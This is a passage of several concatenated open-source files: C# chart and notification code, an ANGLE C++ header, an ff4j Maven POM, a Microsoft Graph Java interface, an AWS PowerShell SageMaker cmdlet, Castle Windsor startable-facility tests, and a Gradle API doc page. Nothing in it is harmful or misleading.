var colorCompleted = new RockColor( ChartJsConstants.Colors.Green ); var completedDataset = this.CreateDataSet( allDataPoints, "Completed", colorCompleted.ToHex() ); factory.Datasets.Add( completedDataset ); return factory; } private ChartJsTimeSeriesDataset CreateDataSet( IOrderedEnumerable<ChartDatasetInfo> allDataPoints, string datasetName, string colorString ) { var dataset = new ChartJsTimeSeriesDataset(); dataset.Name = datasetName; dataset.DataPoints = allDataPoints .Where( x => x.DatasetName == datasetName ) .Select( x => new ChartJsTimeSeriesDataPoint { DateTime = x.DateTime, Value = x.Value } ) .Cast<IChartJsTimeSeriesDataPoint>() .ToList(); dataset.BorderColor = colorString; return dataset; } #endregion #region Support Classes [Serializable] private class StepWorkflowTriggerViewModel { public int Id { get; set; } public Guid Guid { get; set; } public string WorkflowTypeName { get; set; } public int? StepTypeId { get; set; } public int WorkflowTypeId { get; set; } public StepWorkflowTrigger.WorkflowTriggerCondition TriggerType { get; set; } public string TypeQualifier { get; set; } public string TriggerDescription { get; set; } public StepWorkflowTriggerViewModel() { // } public StepWorkflowTriggerViewModel( StepWorkflowTrigger trigger ) { Id = trigger.Id; Guid = trigger.Guid; StepTypeId = trigger.StepTypeId; TriggerType = trigger.TriggerType; TypeQualifier = trigger.TypeQualifier; if ( trigger.WorkflowType != null ) { WorkflowTypeId = trigger.WorkflowType.Id; WorkflowTypeName = trigger.WorkflowType.Name; } } } /// <summary> /// Stores information about a dataset to be displayed on a chart. 
/// </summary> private class ChartDatasetInfo { public string DatasetName { get; set; } public DateTime DateTime { get; set; } public int Value { get; set; } public string SortKey { get; set; } } #endregion #region Block Notifications private NotificationBox _notificationControl; private Control _detailContainerControl; /// <summary> /// Initialize block-level notification message handlers for block configuration changes. /// </summary> /// <param name="triggerPanel"></param> private void InitializeBlockNotification( NotificationBox notificationControl, Control detailContainerControl ) { _notificationControl = notificationControl; _detailContainerControl = detailContainerControl; ClearBlockNotification(); } /// <summary> /// Reset the notification message for the block. /// </summary> public void ClearBlockNotification() { _notificationControl.Visible = false; _detailContainerControl.Visible = true; } /// <summary> /// Show a notification message for the block. /// </summary> /// <param name="notificationControl"></param> /// <param name="message"></param> /// <param name="notificationType"></param> public void ShowNotification( string message, NotificationBoxType notificationType = NotificationBoxType.Info, bool hideBlockContent = false ) { _notificationControl.Text = message; _notificationControl.NotificationBoxType = notificationType; _notificationControl.Visible = true; _detailContainerControl.Visible = !hideBlockContent; } #endregion } }
{ "pile_set_name": "Github" }
// // Copyright 2011 The ANGLE Project Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. // #ifndef COMPILER_TRANSLATOR_BUILTINFUNCTIONEMULATOR_H_ #define COMPILER_TRANSLATOR_BUILTINFUNCTIONEMULATOR_H_ #include "compiler/translator/InfoSink.h" namespace sh { class TIntermNode; class TFunction; class TSymbolUniqueId; using BuiltinQueryFunc = const char *(int); // // This class decides which built-in functions need to be replaced with the emulated ones. It can be // used to work around driver bugs or implement functions that are not natively implemented on a // specific platform. // class BuiltInFunctionEmulator { public: BuiltInFunctionEmulator(); void markBuiltInFunctionsForEmulation(TIntermNode *root); void cleanup(); // "name" gets written as "name_emu". static void WriteEmulatedFunctionName(TInfoSinkBase &out, const char *name); bool isOutputEmpty() const; // Output function emulation definition. This should be before any other shader source. void outputEmulatedFunctions(TInfoSinkBase &out) const; // Add functions that need to be emulated. void addEmulatedFunction(const TSymbolUniqueId &uniqueId, const char *emulatedFunctionDefinition); void addEmulatedFunctionWithDependency(const TSymbolUniqueId &dependency, const TSymbolUniqueId &uniqueId, const char *emulatedFunctionDefinition); void addFunctionMap(BuiltinQueryFunc queryFunc); private: class BuiltInFunctionEmulationMarker; // Records that a function is called by the shader and might need to be emulated. If the // function is not in mEmulatedFunctions, this becomes a no-op. Returns true if the function // call needs to be replaced with an emulated one. 
bool setFunctionCalled(const TFunction *function); bool setFunctionCalled(int uniqueId); const char *findEmulatedFunction(int uniqueId) const; // Map from function unique id to emulated function definition std::map<int, std::string> mEmulatedFunctions; // Map from dependent functions to their dependencies. This structure allows each function to // have at most one dependency. std::map<int, int> mFunctionDependencies; // Called function ids std::vector<int> mFunctions; // Constexpr function tables. std::vector<BuiltinQueryFunc *> mQueryFunctions; }; } // namespace sh #endif // COMPILER_TRANSLATOR_BUILTINFUNCTIONEMULATOR_H_
{ "pile_set_name": "Github" }
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
	<modelVersion>4.0.0</modelVersion>

	<!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<!-- ~ COORDINATES ~ -->
	<!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<artifactId>ff4j-store-commonsconfig</artifactId>
	<packaging>jar</packaging>
	<name>ff4j-store-commonsconfig</name>

	<!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<!-- ~ PARENT ~ -->
	<!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<!-- groupId and version are inherited from the ff4j parent. -->
	<parent>
		<groupId>org.ff4j</groupId>
		<artifactId>ff4j-parent</artifactId>
		<version>1.8.10-SNAPSHOT</version>
	</parent>

	<!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<!-- ~ PROPERTIES ~ -->
	<!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<properties>
		<license.licenseResolver>${project.baseUri}/../src/license</license.licenseResolver>
		<commonsconfig.version>1.10</commonsconfig.version>
	</properties>

	<!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<!-- ~ DEPENDENCIES ~ -->
	<!-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<dependencies>

		<!-- logger -->
		<dependency>
			<groupId>org.ff4j</groupId>
			<artifactId>ff4j-core</artifactId>
			<version>${project.version}</version>
		</dependency>

		<!-- CommonsConfig -->
		<dependency>
			<groupId>commons-configuration</groupId>
			<artifactId>commons-configuration</artifactId>
			<version>${commonsconfig.version}</version>
		</dependency>

		<!-- Tests -->
		<dependency>
			<groupId>junit</groupId>
			<artifactId>junit</artifactId>
			<scope>test</scope>
		</dependency>
		<dependency>
			<groupId>org.ff4j</groupId>
			<artifactId>ff4j-test</artifactId>
			<version>${project.version}</version>
			<scope>test</scope>
		</dependency>
		<!-- Route commons-logging (used by commons-configuration) onto SLF4J/logback in tests. -->
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>jcl-over-slf4j</artifactId>
			<scope>test</scope>
		</dependency>
		<dependency>
			<groupId>ch.qos.logback</groupId>
			<artifactId>logback-classic</artifactId>
			<scope>test</scope>
		</dependency>
		<dependency>
			<groupId>org.springframework</groupId>
			<artifactId>spring-test</artifactId>
			<scope>test</scope>
		</dependency>
	</dependencies>

</project>
{ "pile_set_name": "Github" }
// ------------------------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information. // ------------------------------------------------------------------------------ package com.microsoft.graph.requests.extensions; import com.microsoft.graph.http.IRequestBuilder; import com.microsoft.graph.core.ClientException; import com.microsoft.graph.concurrency.ICallback; import com.microsoft.graph.models.extensions.TermsAndConditions; import com.microsoft.graph.models.extensions.TermsAndConditionsAssignment; import java.util.Arrays; import java.util.EnumSet; import com.microsoft.graph.requests.extensions.ITermsAndConditionsAssignmentRequestBuilder; import com.microsoft.graph.requests.extensions.ITermsAndConditionsAssignmentCollectionRequest; import com.microsoft.graph.http.IBaseCollectionPage; // **NOTE** This file was generated by a tool and any changes will be overwritten. /** * The interface for the Terms And Conditions Assignment Collection Request Builder. */ public interface ITermsAndConditionsAssignmentCollectionRequestBuilder extends IRequestBuilder { /** * Creates the request * * @param requestOptions the options for this request * @return the IUserRequest instance */ ITermsAndConditionsAssignmentCollectionRequest buildRequest(final com.microsoft.graph.options.Option... requestOptions); /** * Creates the request * * @param requestOptions the options for this request * @return the IUserRequest instance */ ITermsAndConditionsAssignmentCollectionRequest buildRequest(final java.util.List<? extends com.microsoft.graph.options.Option> requestOptions); ITermsAndConditionsAssignmentRequestBuilder byId(final String id); }
{ "pile_set_name": "Github" }
/*******************************************************************************
 *  Copyright 2012-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
 *  Licensed under the Apache License, Version 2.0 (the "License"). You may not use
 *  this file except in compliance with the License. A copy of the License is located at
 *
 *  http://aws.amazon.com/apache2.0
 *
 *  or in the "license" file accompanying this file.
 *  This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
 *  CONDITIONS OF ANY KIND, either express or implied. See the License for the
 *  specific language governing permissions and limitations under the License.
 * *****************************************************************************
 *
 *  AWS Tools for Windows (TM) PowerShell (TM)
 *
 */

using System;
using System.Collections.Generic;
using System.Linq;
using System.Management.Automation;
using System.Text;
using Amazon.PowerShell.Common;
using Amazon.Runtime;
using Amazon.SageMaker;
using Amazon.SageMaker.Model;

namespace Amazon.PowerShell.Cmdlets.SM
{
    /// <summary>
    /// Returns information about a transform job.
    /// NOTE(review): this cmdlet is generated tooling output; behavioral changes belong in the generator.
    /// </summary>
    [Cmdlet("Get", "SMTransformJob")]
    [OutputType("Amazon.SageMaker.Model.DescribeTransformJobResponse")]
    [AWSCmdlet("Calls the Amazon SageMaker Service DescribeTransformJob API operation.", Operation = new[] {"DescribeTransformJob"}, SelectReturnType = typeof(Amazon.SageMaker.Model.DescribeTransformJobResponse))]
    [AWSCmdletOutput("Amazon.SageMaker.Model.DescribeTransformJobResponse",
        "This cmdlet returns an Amazon.SageMaker.Model.DescribeTransformJobResponse object containing multiple properties. The object can also be referenced from properties attached to the cmdlet entry in the $AWSHistory stack."
    )]
    public partial class GetSMTransformJobCmdlet : AmazonSageMakerClientCmdlet, IExecutor
    {

        #region Parameter TransformJobName
        /// <summary>
        /// <para>
        /// <para>The name of the transform job that you want to view details of.</para>
        /// </para>
        /// </summary>
        // In the modular (per-service) build the parameter is mandatory; the monolithic build
        // relies on the AWSRequiredParameter attribute plus a runtime warning instead.
        #if !MODULAR
        [System.Management.Automation.Parameter(Position = 0, ValueFromPipelineByPropertyName = true, ValueFromPipeline = true)]
        #else
        [System.Management.Automation.Parameter(Position = 0, ValueFromPipelineByPropertyName = true, ValueFromPipeline = true, Mandatory = true)]
        [System.Management.Automation.AllowEmptyString]
        [System.Management.Automation.AllowNull]
        #endif
        [Amazon.PowerShell.Common.AWSRequiredParameter]
        public System.String TransformJobName { get; set; }
        #endregion

        #region Parameter Select
        /// <summary>
        /// Use the -Select parameter to control the cmdlet output. The default value is '*'.
        /// Specifying -Select '*' will result in the cmdlet returning the whole service response (Amazon.SageMaker.Model.DescribeTransformJobResponse).
        /// Specifying the name of a property of type Amazon.SageMaker.Model.DescribeTransformJobResponse will result in that property being returned.
        /// Specifying -Select '^ParameterName' will result in the cmdlet returning the selected cmdlet parameter value.
        /// </summary>
        [System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
        public string Select { get; set; } = "*";
        #endregion

        #region Parameter PassThru
        /// <summary>
        /// Changes the cmdlet behavior to return the value passed to the TransformJobName parameter.
        /// The -PassThru parameter is deprecated, use -Select '^TransformJobName' instead. This parameter will be removed in a future version.
        /// </summary>
        [System.Obsolete("The -PassThru parameter is deprecated, use -Select '^TransformJobName' instead. This parameter will be removed in a future version.")]
        [System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
        public SwitchParameter PassThru { get; set; }
        #endregion

        protected override void ProcessRecord()
        {
            base.ProcessRecord();

            var context = new CmdletContext();

            // allow for manipulation of parameters prior to loading into context
            PreExecutionContextLoad(context);

            // -Select and the deprecated -PassThru are mutually exclusive; resolve the
            // output selector delegate from whichever was supplied.
            #pragma warning disable CS0618, CS0612 //A class member was marked with the Obsolete attribute
            if (ParameterWasBound(nameof(this.Select)))
            {
                context.Select = CreateSelectDelegate<Amazon.SageMaker.Model.DescribeTransformJobResponse, GetSMTransformJobCmdlet>(Select) ??
                    throw new System.ArgumentException("Invalid value for -Select parameter.", nameof(this.Select));
                if (this.PassThru.IsPresent)
                {
                    throw new System.ArgumentException("-PassThru cannot be used when -Select is specified.", nameof(this.Select));
                }
            }
            else if (this.PassThru.IsPresent)
            {
                context.Select = (response, cmdlet) => this.TransformJobName;
            }
            #pragma warning restore CS0618, CS0612 //A class member was marked with the Obsolete attribute
            context.TransformJobName = this.TransformJobName;
            #if MODULAR
            if (this.TransformJobName == null && ParameterWasBound(nameof(this.TransformJobName)))
            {
                WriteWarning("You are passing $null as a value for parameter TransformJobName which is marked as required. In case you believe this parameter was incorrectly marked as required, report this by opening an issue at https://github.com/aws/aws-tools-for-powershell/issues.");
            }
            #endif

            // allow further manipulation of loaded context prior to processing
            PostExecutionContextLoad(context);

            var output = Execute(context) as CmdletOutput;
            ProcessOutput(output);
        }

        #region IExecutor Members

        public object Execute(ExecutorContext context)
        {
            var cmdletContext = context as CmdletContext;
            // create request
            var request = new Amazon.SageMaker.Model.DescribeTransformJobRequest();

            if (cmdletContext.TransformJobName != null)
            {
                request.TransformJobName = cmdletContext.TransformJobName;
            }

            CmdletOutput output;

            // issue call
            var client = Client ?? CreateClient(_CurrentCredentials, _RegionEndpoint);
            try
            {
                var response = CallAWSServiceOperation(client, request);
                object pipelineOutput = null;
                pipelineOutput = cmdletContext.Select(response, this);
                output = new CmdletOutput
                {
                    PipelineOutput = pipelineOutput,
                    ServiceResponse = response
                };
            }
            catch (Exception e)
            {
                // Errors are surfaced through the CmdletOutput rather than thrown,
                // so pipeline processing can continue.
                output = new CmdletOutput { ErrorResponse = e };
            }

            return output;
        }

        public ExecutorContext CreateContext()
        {
            return new CmdletContext();
        }

        #endregion

        #region AWS Service Operation Call

        private Amazon.SageMaker.Model.DescribeTransformJobResponse CallAWSServiceOperation(IAmazonSageMaker client, Amazon.SageMaker.Model.DescribeTransformJobRequest request)
        {
            Utils.Common.WriteVerboseEndpointMessage(this, client.Config, "Amazon SageMaker Service", "DescribeTransformJob");
            try
            {
                // Desktop builds use the synchronous API; CoreCLR only exposes the async API.
                #if DESKTOP
                return client.DescribeTransformJob(request);
                #elif CORECLR
                return client.DescribeTransformJobAsync(request).GetAwaiter().GetResult();
                #else
                        #error "Unknown build edition"
                #endif
            }
            catch (AmazonServiceException exc)
            {
                var webException = exc.InnerException as System.Net.WebException;
                if (webException != null)
                {
                    // Wrap DNS/endpoint resolution failures with a friendlier message.
                    throw new Exception(Utils.Common.FormatNameResolutionFailureMessage(client.Config, webException.Message), webException);
                }
                throw;
            }
        }

        #endregion

        // Carries the bound parameter values and the output selector into Execute().
        internal partial class CmdletContext : ExecutorContext
        {
            public System.String TransformJobName { get; set; }
            public System.Func<Amazon.SageMaker.Model.DescribeTransformJobResponse, GetSMTransformJobCmdlet, object> Select { get; set; } =
                (response, cmdlet) => response;
        }

    }
}
{ "pile_set_name": "Github" }
// Copyright 2004-2011 Castle Project - http://www.castleproject.org/
// 
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// 
//     http://www.apache.org/licenses/LICENSE-2.0
// 
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

namespace Castle.Windsor.Tests.Facilities.Startable
{
	using Castle.Facilities.Startable;
	using Castle.MicroKernel.Handlers;
	using Castle.MicroKernel.Registration;
	using Castle.MicroKernel.SubSystems.Configuration;

	using CastleTests.Components;

	using NUnit.Framework;

	/// <summary>
	///   Exercises the <see cref="StartableFacility" /> in deferred-start mode when the
	///   startable component (<c>UsesIEmptyService</c>) depends on a service registered
	///   through a decorator chain (<c>EmptyServiceDecorator</c> wrapping <c>EmptyServiceA</c>).
	///   The tests show that registration ordering decides success: registering the
	///   startable component before its dependencies throws a <see cref="HandlerException" />.
	/// </summary>
	[TestFixture]
	public class StartableAndDecoratorsTestCase
	{
		// Registers the decorated dependency chain and the startable component in one installer.
		private class AllInstaller : IWindsorInstaller
		{
			public void Install(IWindsorContainer container, IConfigurationStore store)
			{
				container.Register(
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(),
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>());
				container.Register(Component.For<UsesIEmptyService>().Start());
			}
		}

		// Registers only the IEmptyService decorator chain.
		private class DependenciesInstaller : IWindsorInstaller
		{
			public void Install(IWindsorContainer container, IConfigurationStore store)
			{
				container.Register(
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(),
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>());
			}
		}

		// Registers only the startable component.
		private class StartableInstaller : IWindsorInstaller
		{
			public void Install(IWindsorContainer container, IConfigurationStore store)
			{
				container.Register(Component.For<UsesIEmptyService>().Start());
			}
		}

		[Test]
		public void No_startable_explicit_Resolve_resolves_with_no_issues()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				container.Register(
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(),
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>(),
					Component.For<UsesIEmptyService>()
					);
				container.Resolve<UsesIEmptyService>();
			}
		}

		[Test]
		public void Startable_and_components_in_separate_Install_Resolve_Startable_last_works()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				container.Install(new DependenciesInstaller());
				container.Register(Component.For<UsesIEmptyService>().Start());
			}
		}

		[Test]
		public void Startable_and_components_in_separate_Install_Startable_first_throws()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				// The startable is installed before its dependency chain exists.
				Assert.Throws<HandlerException>(() =>
				{
					container.Install(new StartableInstaller());
					container.Install(new DependenciesInstaller());
				});
			}
		}

		[Test]
		public void Startable_and_components_in_separate_Install_Startable_last_works()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				container.Install(new DependenciesInstaller());
				container.Install(new StartableInstaller());
			}
		}

		[Test]
		public void Startable_and_components_in_single_Install_works()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				container.Install(new DependenciesInstaller(), new StartableInstaller());
			}
		}

		[Test]
		public void Startable_and_components_in_single_Installer_works()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				container.Install(new AllInstaller());
			}
		}

		[Test]
		public void Startable_and_components_in_single_Register_works()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				container.Register(
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(),
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>(),
					Component.For<UsesIEmptyService>().Start()
					);
			}
		}

		[Test]
		public void Startable_and_components_separate_Register_Startable_first_throws()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				// Registering the startable before its dependencies is an error.
				Assert.Throws<HandlerException>(() =>
				{
					container.Register(Component.For<UsesIEmptyService>().Start());
					container.Register(
						Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(),
						Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>());
				});
			}
		}

		[Test]
		public void Startable_and_components_separate_Register_Startable_last_works()
		{
			using (var container = new WindsorContainer())
			{
				container.AddFacility<StartableFacility>(f => f.DeferredStart());
				container.Register(
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(),
					Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>());
				container.Register(Component.For<UsesIEmptyService>().Start());
			}
		}
	}
}
{ "pile_set_name": "Github" }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- **************************************************************** -->
<!-- * PLEASE KEEP COMPLICATED EXPRESSIONS OUT OF THESE TEMPLATES, * -->
<!-- * i.e. only iterate & print data where possible. Thanks, Jez. * -->
<!-- **************************************************************** -->
<html>
<head>
<!-- Generated by groovydoc (2.3.3) on Tue Jul 01 09:50:59 CEST 2014 -->
<title>OsgiPluginConvention (Gradle API 2.0)</title>
<meta name="date" content="2014-07-01">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link href="../../../../../groovy.ico" type="image/x-icon" rel="shortcut icon">
<link href="../../../../../groovy.ico" type="image/x-icon" rel="icon">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body class="center">
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="OsgiPluginConvention (Gradle API 2.0)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!--   -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!--   -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<div>
<ul class="navList">
<li><a href="../../../../../index.html?org/gradle/api/plugins/osgi/OsgiPluginConvention" target="_top">Frames</a></li>
<li><a href="OsgiPluginConvention.html" target="_top">No
Frames</a></li> </ul> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> Nested&nbsp;&nbsp;&nbsp;Field&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<li><a href="#constructor_summary">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_summary">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> <ul class="subNavList"> <li>&nbsp;|&nbsp;Detail:&nbsp;</li> Field&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<li><a href="#constructor_detail">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_detail">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">Package: <strong>org.gradle.api.plugins.osgi</strong></div> <h2 title="[Java] Class OsgiPluginConvention" class="title">[Java] Class OsgiPluginConvention</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li><ul class="inheritance"></ul></li><li>org.gradle.api.plugins.osgi.OsgiPluginConvention </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <p> Is mixed in into the project when applying the <a href='../../../../../org/gradle/api/plugins/osgi/OsgiPlugin.html' title='OsgiPlugin'>OsgiPlugin</a> . 
</p> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== NESTED CLASS SUMMARY =========== --> <!-- =========== ENUM CONSTANT SUMMARY =========== --> <!-- =========== FIELD SUMMARY =========== --> <!-- =========== PROPERTY SUMMARY =========== --> <!-- =========== ELEMENT SUMMARY =========== --> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_summary"><!-- --></a> <h3>Constructor Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructors Summary table"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Constructor and description</th> </tr> <tr class="altColor"> <td class="colFirst"> <code><a href="#OsgiPluginConvention(ProjectInternal)">OsgiPluginConvention</a></strong> (<a href='../../../../../ProjectInternal.html'>ProjectInternal</a> project)</code><br></td> </tr> </table> </ul> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"><!-- --></a> <h3>Methods Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Methods Summary table"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Type</th> <th class="colLast" scope="col">Name and description</th> </tr> <tr class="altColor"> <td class="colFirst"><code><a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html'>OsgiManifest</a></strong></code></td> <td class="colLast"><code><strong><a href="#osgiManifest()">osgiManifest</a></strong>()</code><br>Creates a new instance of <a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html' title='OsgiManifest'>OsgiManifest</a>. 
</td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html'>OsgiManifest</a></strong></code></td> <td class="colLast"><code><strong><a href="#osgiManifest(groovy.lang.Closure)">osgiManifest</a></strong>(<a href='http://groovy.codehaus.org/gapi/groovy/lang/Closure.html' title='Closure'>Closure</a> closure)</code><br>Creates and configures a new instance of an <a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html' title='OsgiManifest'>OsgiManifest</a> . </td> </tr> </table> </ul> </li> <li class="blockList"><a name="method_summary"><!-- --></a> <h3>Inherited Methods Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Inherited Methods Summary table"> <caption><span>Inherited Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Methods inherited from class</th> <th class="colLast" scope="col">Name</th> </tr> <tr class="altColor"> <td class="colFirst"><code>class <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html' title='Object'>Object</a></strong></code></td> <td class="colLast"><code><a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#wait(long, int)' title='wait'>wait</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#wait(long)' title='wait'>wait</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#wait()' title='wait'>wait</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#equals(java.lang.Object)' title='equals'>equals</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#toString()' title='toString'>toString</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#hashCode()' title='hashCode'>hashCode</a>, <a 
href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#getClass()' title='getClass'>getClass</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#notify()' title='notify'>notify</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#notifyAll()' title='notifyAll'>notifyAll</a></code></td> </tr> </table> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- =========== CONSTRUCTOR DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="constructor_detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="OsgiPluginConvention(ProjectInternal)"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>public&nbsp;<strong>OsgiPluginConvention</strong>(<a href='../../../../../ProjectInternal.html'>ProjectInternal</a> project)</h4> <p></p> </li> </ul> </li> </ul> <!-- =========== METHOD DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="osgiManifest()"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>public&nbsp;<a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html'>OsgiManifest</a> <strong>osgiManifest</strong>()</h4> <p> Creates a new instance of <a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html' title='OsgiManifest'>OsgiManifest</a>. The returned object is preconfigured with: <pre> version: project.version name: project.archivesBaseName symbolicName: project.group + "." + project.archivesBaseName (see below for exceptions to this rule) </pre> The symbolic name is usually the group + "." + archivesBaseName, with the following exceptions <ul> <li>if group has only one section (no dots) and archivesBaseName is not null then the first package name with classes is returned. eg. 
commons-logging:commons-logging -> org.apache.commons.logging</li> <li>if archivesBaseName is equal to last section of group then group is returned. eg. org.gradle:gradle -> org.gradle</li> <li>if archivesBaseName starts with last section of group that portion is removed. eg. org.gradle:gradle-core -> org.gradle.core</li> </ul> </p> </li> </ul> <a name="osgiManifest(groovy.lang.Closure)"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>public&nbsp;<a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html'>OsgiManifest</a> <strong>osgiManifest</strong>(<a href='http://groovy.codehaus.org/gapi/groovy/lang/Closure.html' title='Closure'>Closure</a> closure)</h4> <p> Creates and configures a new instance of an <a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html' title='OsgiManifest'>OsgiManifest</a> . The closure configures the new manifest instance before it is returned. </p> </li> </ul> </li> </ul> </li> </ul> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a 